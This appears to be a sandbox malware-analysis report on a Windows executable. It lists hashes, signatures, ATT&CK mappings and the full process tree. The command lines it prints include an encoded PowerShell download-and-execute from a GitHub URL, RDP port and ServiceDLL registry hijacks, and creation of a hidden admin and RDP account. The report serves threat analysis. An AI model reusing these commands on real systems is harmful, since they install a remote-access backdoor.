Overview

overview

10

Static

static

eee9090fed...f2.exe

windows7_x64

10

eee9090fed...f2.exe

windows10_x64

10

Analysis

  • max time kernel
    50s
  • max time network
    118s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    09-11-2020 21:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe

  • Size

    3.5MB

  • MD5

    551466c49c45b71ee7b4d5a4fc0a800e

  • SHA1

    be312273c1db869c5f23cc9ba24b31b66824a809

  • SHA256

    eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2

  • SHA512

    1f4de516895870a74444b560df538259137900d73b78970926d7bebd0e759976630273e21c8cd6921aec85d614d6d305071cccf5c217762665e5e91d24694e4a

Score
10/10
persistenceupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies service 2 TTPs 2 IoCs
    persistence
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 217 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 77 IoCs
  • Suspicious use of WriteProcessMemory 72 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe
    "C:\Users\Admin\AppData\Local\Temp\eee9090fedb6cf32b1729db9cafb6b7995f45d7e417029e124b7960f06d194f2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1028
    • \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3656
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8022.tmp" "c:\Users\Admin\AppData\Local\Temp\xmkjgs20\CSC3C8662C2998F402F926B99A1C49107C.TMP"
          4⤵
            PID:2224
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:2556
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:184
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:208
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:428
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2524
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2064
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3300
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2380
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:4020
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3976
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3176
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3156
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:2360
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:208
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2524
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user wgautilacc Ghar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2544
                    • C:\Windows\system32\net.exe
                      net.exe user wgautilacc Ghar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2180
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                        3⤵
                          PID:3904
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user wgautilacc xvYay6Ls /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3980
                      • C:\Windows\system32\net.exe
                        net.exe user wgautilacc xvYay6Ls /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3424
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user wgautilacc xvYay6Ls /add
                          3⤵
                            PID:200
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2600
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2524
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                            3⤵
                              PID:2460
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3964
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2420
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
                              3⤵
                                PID:752
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2508
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3084
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                3⤵
                                  PID:2544
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc xvYay6Ls
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3956
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc xvYay6Ls
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2856
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user wgautilacc xvYay6Ls
                                  3⤵
                                    PID:3980
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3996
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                  • Modifies data under HKEY_USERS
                                  PID:3588
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic CPU get NAME
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2960
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic CPU get NAME
                                  2⤵
                                    PID:2380
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1580
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3988
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      3⤵
                                      • Blacklisted process makes network request
                                      • Drops file in Program Files directory
                                      • Drops file in Windows directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2544
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C net user wgautilacc 1234
                                  1⤵
                                    PID:2420
                                    • C:\Windows\system32\net.exe
                                      net user wgautilacc 1234
                                      2⤵
                                        PID:2616
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user wgautilacc 1234
                                          3⤵
                                            PID:4020

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Initial Access

                                      Execution

                                      Persistence

                                      Account Manipulation

                                      1
                                      T1098

                                      Registry Run Keys / Startup Folder

                                      1
                                      T1060

                                      Modify Existing Service

                                      1
                                      T1031

                                      Privilege Escalation

                                      Defense Evasion

                                      Modify Registry

                                      3
                                      T1112

                                      Credential Access

                                      Discovery

                                      Lateral Movement

                                      Remote Desktop Protocol

                                      1
                                      T1076

                                      Collection

                                      Exfiltration

                                      Command and Control

                                      Impact

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Temp\RES8022.tmp
                                        MD5

                                        f1c19fdcd8e34091b934106f106183b1

                                        SHA1

                                        db8f845fe8cce2845257263e8b7148e415b1f904

                                        SHA256

                                        dbf6f142324e7dbeda2167e6ae05ea01e984b988e67a03f4d981861ca0cfd006

                                        SHA512

                                        4284b947d27b0fedb1029a977366febaf5776e3169d4929ef25584b1fc836402bb8f30ff2d37a3ee7839634a201faa38a36c9cd9bf1e7f053e0c6170015381b6

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                        MD5

                                        bcac3bbb18f093dbc8e5e76d2675695f

                                        SHA1

                                        96453f65b41e428937349e6f48fe67d6dfd6a580

                                        SHA256

                                        b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

                                        SHA512

                                        78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                        MD5

                                        42c2a160d2d191e6ffcc1076b4734ee2

                                        SHA1

                                        c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

                                        SHA256

                                        2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

                                        SHA512

                                        3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

                                        Download Submit
                                      • C:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.dll
                                        MD5

                                        94e31e7357d6b8274ea78e8eb2265982

                                        SHA1

                                        24b8622e8502f3932dda8a0fe3425cca9608db31

                                        SHA256

                                        a3790a9a02138e9575cf5092fe2d1f91c2ef194d8aa256627ad02e2fbeed0c7e

                                        SHA512

                                        99fccd8aead3b37d0a7328cffb1e654e8cf7d5cf8b144a39882848c6c84acfb5558937d3ebe15c5785fbde90121e839231f4182365b4836aba0080fa2638d4b7

                                        Download Submit
                                      • \??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\CSC3C8662C2998F402F926B99A1C49107C.TMP
                                        MD5

                                        ff15bea84c021981afbeaef3c8f191ca

                                        SHA1

                                        cc351c79314b2f6e8fa6f18e2cc1c6b5eca991cf

                                        SHA256

                                        26035b74e539e4882d4ad60382794b546d801867425debc0a0848d497a3615ca

                                        SHA512

                                        a50c71cf6e594826922a9025805d97d50f107f152f60c5b880a070498ca233e793d4e4b53c11daf289b2a555f23b5e24bb8a27228653f9ae46292a0ac5048927

                                        Download Submit
                                      • \??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.0.cs
                                        MD5

                                        6f235215132cdebacd0f793fe970d0e3

                                        SHA1

                                        2841e44c387ed3b6f293611992f1508fe9b55b89

                                        SHA256

                                        ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                        SHA512

                                        a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                        Download Submit
                                      • \??\c:\Users\Admin\AppData\Local\Temp\xmkjgs20\xmkjgs20.cmdline
                                        MD5

                                        04ed560c0f1794390e4fd54ae7acf985

                                        SHA1

                                        29387bbea3bcbc12a55274d6331dce68431f592f

                                        SHA256

                                        0af1da3715122acebbd553e146f89551fe5ed2a75342eaa76b0354d300839497

                                        SHA512

                                        ad4cb56438d379ef84f07093ede7e10c50b7926df9400268befec913cf2c16e9b4d014e7177cb2650ef36bd76f15970505dc017dfacc2aa938d7d302d86cfcbc

                                        Download Submit
                                      • \Windows\Branding\mediasrv.png
                                        MD5

                                        f357d4e7b83bc0a41c65d97f3e6f50f4

                                        SHA1

                                        71db3180a8ada6d5d7722c54a5940c3490f78636

                                        SHA256

                                        db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

                                        SHA512

                                        566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

                                        Download Submit
                                      • \Windows\Branding\mediasvc.png
                                        MD5

                                        d5de6f599d9807bac2f5a8e751a8c38f

                                        SHA1

                                        9e70edf56b6a5768fda84232e9c557e750d3631b

                                        SHA256

                                        18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

                                        SHA512

                                        e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

                                        Download Submit
                                      • memory/184-16-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/200-33-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/208-50-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/208-17-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/428-18-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/752-37-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/940-3-0x00007FFC34CC0000-0x00007FFC356AC000-memory.dmp
                                        Filesize

                                        9.9MB

                                        Download
                                      • memory/940-14-0x0000029CA3B30000-0x0000029CA3B31000-memory.dmp
                                        Filesize

                                        4KB

                                        Download
                                      • memory/940-5-0x0000029CA3BB0000-0x0000029CA3BB1000-memory.dmp
                                        Filesize

                                        4KB

                                        Download
                                      • memory/940-4-0x0000029CA3A00000-0x0000029CA3A01000-memory.dmp
                                        Filesize

                                        4KB

                                        Download
                                      • memory/940-2-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/1028-1-0x0000000002930000-0x0000000002931000-memory.dmp
                                        Filesize

                                        4KB

                                        Download
                                      • memory/2064-20-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2180-30-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2224-10-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2360-27-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2380-43-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2380-22-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2420-36-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2460-35-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2524-34-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2524-51-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2524-19-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2544-39-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2544-46-0x00007FFC34CC0000-0x00007FFC356AC000-memory.dmp
                                        Filesize

                                        9.9MB

                                        Download
                                      • memory/2544-45-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2556-15-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2616-52-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/2856-40-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3084-38-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3156-26-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3176-25-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3300-21-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3424-32-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3588-42-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3656-7-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3904-31-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3976-24-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3980-41-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/3988-44-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/4020-23-0x0000000000000000-mapping.dmp
                                        Download
                                      • memory/4020-53-0x0000000000000000-mapping.dmp
                                        Download